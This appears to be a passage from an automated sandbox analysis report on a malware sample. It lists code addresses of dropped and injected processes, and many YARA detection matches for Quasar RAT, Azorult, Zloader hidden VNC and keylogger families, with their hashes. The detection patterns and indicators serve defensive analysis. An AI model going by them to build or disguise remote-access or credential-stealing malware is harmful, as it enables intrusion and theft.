Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Code function: 4_2_00AC6263
Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Code function: 4_2_00ADD39B
Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Code function: 4_2_00AD2F13
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00C788A0
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00C694B0
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00C63C6C
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00C7B420
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00C809D4
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00C72DE0
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00C76984
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00C799B0
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00C84174
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00C7DED4
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00C7FAD4
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00C7EADC
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00C766A4
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00C73A10
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00C687CC
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00C727D4
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00C803EC
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00C733EC
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00C84BE4
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00C82F5C
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00C6B36C
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00C68F68
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00C78F34
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00CA9878
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00CAA1A4
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00CA9D0E
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00CAAAD0
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00CAAEB3
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00CAA63A
Source: C:\Windows\System32\svchost.exe, Code function: 5_2_00CB7B63
Source: C:\Users\user\AppData\Local\Temp\windef.exe, Code function: 6_2_00F12EC4
Source: C:\Users\user\AppData\Local\Temp\windef.exe, Code function: 6_2_00F18FCC
Source: C:\Users\user\AppData\Local\Temp\windef.exe, Code function: 6_2_00F17482
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 7_2_00DC8808
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 7_2_00DC3030
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 7_2_00DD21C5
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 7_2_00DD3187
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 7_2_00DD1978
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 7_2_00DB1287
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 7_2_00DDCB21
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 7_2_00DBFCE0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 7_2_00DD1484
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 7_2_00DD25FA
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 7_2_00E37DDB
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 7_2_00DD1D90
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 7_2_00DC5520
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 7_2_00DC5760
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 7_2_00DBDF00
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00A63187
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00A4FCE0
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00A4E6A0
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00A4DF00
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00A53030
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00A58808
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00A621C5
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00A6F1D9
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00A6D975
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00A61978
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00A41287
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00A762D2
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00A6CB21
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00A61484
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00A7242E
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00A6BDA6
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00A76DB6
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00A61D90
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00A625FA
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00AC7DDB
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00A55520
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00A566E1
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00A56F9E
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: 10_2_00A55760
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Process Stats: CPU usage > 98%
Source: CVbJSUXraQ.exe, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CVbJSUXraQ.exe, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CVbJSUXraQ.exe, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CVbJSUXraQ.exe, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CVbJSUXraQ.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Source: CVbJSUXraQ.exe, type: SAMPLE, Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: CVbJSUXraQ.exe, type: SAMPLE, Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: CVbJSUXraQ.exe, type: SAMPLE, Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 7.2.CVbJSUXraQ.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
